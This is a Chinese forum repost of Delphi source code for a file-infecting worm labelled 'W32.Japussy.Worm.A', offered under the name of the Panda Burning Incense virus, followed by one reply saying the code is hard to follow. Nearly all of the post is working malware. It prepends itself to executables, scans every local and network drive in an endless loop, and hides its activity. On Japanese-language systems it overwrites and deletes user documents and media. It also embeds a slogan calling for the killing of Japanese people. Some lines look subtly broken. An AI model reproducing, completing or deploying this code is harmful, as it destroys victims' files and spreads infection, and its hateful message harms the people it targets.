熊猫烧香源代码(转)
<SPAN class=tpc_content><FONT size=2>开源者不朽, 只可惜不是真的,但是提供了一个思路,很不错的思路<BR><BR>program Japussy;<BR>uses<BR>Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};<BR>const<BR>HeaderSize = 82432; //病毒体的大小<BR>IconOffset = $12EB8; //PE文件主图标的偏移量<BR><BR>//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同<BR>//查找2800000020的十六进制字符串可以找到主图标的偏移量<BR><BR>{<BR>HeaderSize = 38912; //Upx压缩过病毒体的大小<BR>IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量<BR><BR><BR><BR>//Upx 1.24W 用法: upx -9 --8086 Japussy.exe<BR>}<BR>IconSize = $2E8; //PE文件主图标的大小--744字节<BR>IconTail = IconOffset + IconSize; //PE文件主图标的尾部<BR>ID = $44444444; //感染标记<BR><BR>//我非常爱你码,以备写入<BR>Catchword = 'If a race need to be killed out, it must be Yamato. ' +<BR> 'If a country need to be destroyed, it must be Japan! ' +<BR> '*** W32.Japussy.Worm.A ***';<BR>{$R *.RES}<BR>function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; <BR>stdcall; external 'Kernel32.dll'; //函数声明<BR>var<BR>Tmpfile: string;<BR>Si: STARTUPINFO;<BR>Pi: PROCESS_INFORMATION;<BR>IsJap: Boolean = False; //日文操作系统标记<BR>{ 判断是否为Win9x }<BR>function IsWin9x: Boolean;<BR>var<BR>Ver: TOSVersionInfo;<BR>begin<BR>Result := False;<BR>Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);<BR>if not GetVersionEx(Ver) then<BR>Exit;<BR>if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x<BR>Result := True;<BR>end;<BR>{ 在流之间复制 }<BR>procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;<BR>dStartPos: Integer; Count: Integer);<BR>var<BR>sCurPos, dCurPos: Integer;<BR>begin<BR>sCurPos := Src.Position;<BR>dCurPos := Dst.Position;<BR>Src.Seek(sStartPos, 0);<BR>Dst.Seek(dStartPos, 0);<BR>Dst.CopyFrom(Src, Count);<BR>Src.Seek(sCurPos, 0);<BR>Dst.Seek(dCurPos, 0);<BR>end;<BR>{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }<BR>procedure ExtractFile(FileName: string);<BR>var<BR>sStream, dStream: TFileStream;<BR>begin<BR>try<BR>sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);<BR>try<BR> dStream := TFileStream.Create(FileName, fmCreate);<BR> try<BR> sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分<BR> dStream.CopyFrom(sStream, sStream.Size - HeaderSize);<BR> finally<BR> dStream.Free;<BR> end;<BR>finally<BR> sStream.Free;<BR>end;<BR>except<BR>end;<BR>end;<BR>{ 填充STARTUPINFO结构 }<BR>procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);<BR>begin<BR>Si.cb := SizeOf(Si);<BR>Si.lpReserved := nil;<BR>Si.lpDesktop := nil;<BR>Si.lpTitle := nil;<BR>Si.dwFlags := STARTF_USESHOWWINDOW;<BR>Si.wShowWindow := State;<BR>Si.cbReserved2 := 0;<BR>Si.lpReserved2 := nil;<BR>end;<BR>{ 发带毒邮件 }<BR>procedure SendMail;<BR>begin<BR>//哪位仁兄愿意完成之?汤姆感激不尽!<BR>end;<BR>{ 感染PE文件 }<BR>procedure InfectOneFile(FileName: string);<BR>var<BR>HdrStream, SrcStream: TFileStream;<BR>IcoStream, DstStream: TMemoryStream;<BR>iID: LongInt;<BR>aIcon: TIcon;<BR>Infected, IsPE: Boolean;<BR>i: Integer;<BR>Buf: array of Char;<BR>begin<BR>try //出错则文件正在被使用,退出<BR>if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染<BR> Exit;<BR>Infected := False;<BR>IsPE := False;<BR>SrcStream := TFileStream.Create(FileName, fmOpenRead);<BR>try<BR> for i := 0 to $108 do //检查PE文件头<BR> begin<BR> SrcStream.Seek(i, soFromBeginning);<BR> SrcStream.Read(Buf, 2);<BR> if (Buf = #80) and (Buf = #69) then //PE标记<BR> begin<BR> IsPE := True; //是PE文件<BR> Break;<BR> end;<BR> end;<BR> SrcStream.Seek(-4, soFromEnd); //检查感染标记<BR> SrcStream.Read(iID, 4);<BR> if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染<BR> Infected := True;<BR>finally<BR> SrcStream.Free;<BR>end;<BR>if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出<BR> Exit;<BR>IcoStream := TMemoryStream.Create;<BR>DstStream := TMemoryStream.Create;<BR>try<BR> aIcon := TIcon.Create;<BR> try<BR> //得到被感染文件的主图标(744字节),存入流<BR> aIcon.ReleaseHandle;<BR> aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);<BR> aIcon.SaveToStream(IcoStream);<BR> finally<BR> aIcon.Free;<BR> end;<BR> SrcStream := TFileStream.Create(FileName, fmOpenRead);<BR> //头文件<BR> HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);<BR> try<BR> //写入病毒体主图标之前的数据<BR> CopyStream(HdrStream, 0, DstStream, 0, IconOffset);<BR> //写入目前程序的主图标<BR> CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);<BR> //写入病毒体主图标到病毒体尾部之间的数据<BR> CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);<BR> //写入宿主程序<BR> CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);<BR> //写入已感染的标记<BR> DstStream.Seek(0, 2);<BR> iID := $44444444;<BR> DstStream.Write(iID, 4);<BR> finally<BR> HdrStream.Free;<BR> end;<BR>finally<BR> SrcStream.Free;<BR> IcoStream.Free;<BR> DstStream.SaveToFile(FileName); //替换宿主文件<BR> DstStream.Free;<BR>end;<BR>except;<BR>end;<BR>end;<BR>{ 将目标文件写入我非常爱你码后删除 }<BR>procedure SmashFile(FileName: string);<BR>var<BR>FileHandle: Integer;<BR>i, Size, Mass, Max, Len: Integer;<BR>begin<BR>try<BR>SetFileAttributes(PChar(FileName), 0); //去掉只读属性<BR>FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件<BR>try<BR> Size := GetFileSize(FileHandle, nil); //文件大小<BR> i := 0;<BR> Randomize;<BR> Max := Random(15); //写入我非常爱你码的随机次数<BR> if Max < 5 then<BR> Max := 5;<BR> Mass := Size div Max; //每个间隔块的大小<BR> Len := Length(Catchword);<BR> while i < Max do<BR> begin<BR> FileSeek(FileHandle, i * Mass, 0); //定位<BR> //写入我非常爱你码,将文件彻底破坏掉<BR> FileWrite(FileHandle, Catchword, Len);<BR> Inc(i);<BR> end;<BR>finally<BR> FileClose(FileHandle); //关闭文件<BR>end;<BR>DeleteFile(PChar(FileName)); //删除之<BR>except<BR>end;<BR>end;<BR>{ 获得可写的驱动器列表 }<BR>function GetDrives: string;<BR>var<BR>DiskType: Word;<BR>D: Char;<BR>Str: string;<BR>i: Integer;<BR>begin<BR>for i := 0 to 25 do //遍历26个字母<BR>begin<BR>D := Chr(i + 65);<BR>Str := D + ':\';<BR>DiskType := GetDriveType(PChar(Str));<BR>//得到本地磁盘和网络盘<BR>if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then<BR> Result := Result + D;<BR>end;<BR>end;<BR>{ 遍历目录,感染和摧毁文件 }<BR>procedure LoopFiles(Path, Mask: string);<BR>var<BR>i, Count: Integer;<BR>Fn, Ext: string;<BR>SubDir: TStrings;<BR>SearchRec: TSearchRec;<BR>Msg: TMsg;<BR>function IsValidDir(SearchRec: TSearchRec): Integer;<BR>begin<BR>if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and<BR> (SearchRec.Name <> '..') then<BR> Result := 0 //不是目录<BR>else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and<BR> (SearchRec.Name <> '..') then<BR> Result := 1 //不是根目录<BR>else Result := 2; //是根目录<BR>end;<BR>begin<BR>if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then<BR>begin<BR>repeat<BR> PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑<BR> if IsValidDir(SearchRec) = 0 then<BR> begin<BR> Fn := Path + SearchRec.Name;<BR> Ext := UpperCase(ExtractFileExt(Fn));<BR> if (Ext = '.EXE') or (Ext = '.SCR') then<BR> begin<BR> InfectOneFile(Fn); //感染可执行文件 <BR> end<BR> else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then<BR> begin<BR> //感染HTML和ASP文件,将Base64编码后的病毒写入<BR> //感染浏览此网页的所有用户,这个是我最喜欢的!<BR> //哪位大兄弟愿意完成之?汤姆感激不尽!<BR> end<BR> else if Ext = '.WAB' then //Outlook地址簿文件<BR> begin<BR> //获取Outlook邮件地址<BR> end<BR> else if Ext = '.ADC' then //Foxmail地址自动完成文件<BR> begin<BR> //获取Foxmail邮件地址<BR> end<BR> else if Ext = 'IND' then //Foxmail地址簿文件<BR> begin<BR> //获取Foxmail邮件地址<BR> end<BR> else <BR> begin<BR> if IsJap then //是倭文操作系统<BR> begin<BR> if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or<BR> (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or<BR> (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or<BR> (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or<BR> (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or<BR> (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then<BR> SmashFile(Fn); //摧毁文件<BR> end;<BR> end;<BR> end;<BR> //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑<BR> Sleep(200);<BR>until (FindNext(SearchRec) <> 0);<BR>end;<BR>FindClose(SearchRec);<BR>SubDir := TStringList.Create;<BR>if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then<BR>begin<BR>repeat<BR> if IsValidDir(SearchRec) = 1 then<BR> SubDir.Add(SearchRec.Name);<BR>until (FindNext(SearchRec) <> 0);<BR>end;<BR>FindClose(SearchRec);<BR>Count := SubDir.Count - 1;<BR>for i := 0 to Count do<BR>LoopFiles(Path + SubDir.Strings + '\', Mask);<BR>FreeAndNil(SubDir);<BR>end;<BR>{ 遍历磁盘上所有的文件 }<BR>procedure InfectFiles;<BR>var<BR>DriverList: string;<BR>i, Len: Integer;<BR>begin<BR>if GetACP = 932 then //日文操作系统<BR>IsJap := True; //去死吧!<BR>DriverList := GetDrives; //得到可写的磁盘列表<BR>Len := Length(DriverList);<BR>while True do //死循环<BR>begin<BR>for i := Len downto 1 do //遍历每个磁盘驱动器<BR> LoopFiles(DriverList + ':\', '*.*'); //感染之<BR>SendMail; //发带毒邮件<BR>Sleep(1000 * 60 * 5); //睡眠5分钟<BR>end;<BR>end;<BR>{ 主程序开始 }<BR>begin<BR>if IsWin9x then //是Win9x<BR>RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程<BR>else //WinNT<BR>begin<BR>//远程线程映射到Explorer进程<BR>//哪位兄台愿意完成之?汤姆感激不尽!<BR>end;<BR>//如果是原始病毒体自己<BR>if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then<BR>InfectFiles //感染和发邮件<BR>else //已寄生于宿主程序上了,开始工作<BR>begin<BR>TmpFile := ParamStr(0); //创建临时文件<BR>Delete(TmpFile, Length(TmpFile) - 4, 4);<BR>TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格<BR>ExtractFile(TmpFile); //分离之<BR>FillStartupInfo(Si, SW_SHOWDEFAULT);<BR>CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,<BR> 0, nil, '.', Si, Pi); //创建新进程运行之<BR>InfectFiles; //感染和发邮件<BR>end;<BR>end.</FONT><BR></SPAN>re:熊猫烧香源代码(转)
实在看不懂啊
页:
[1]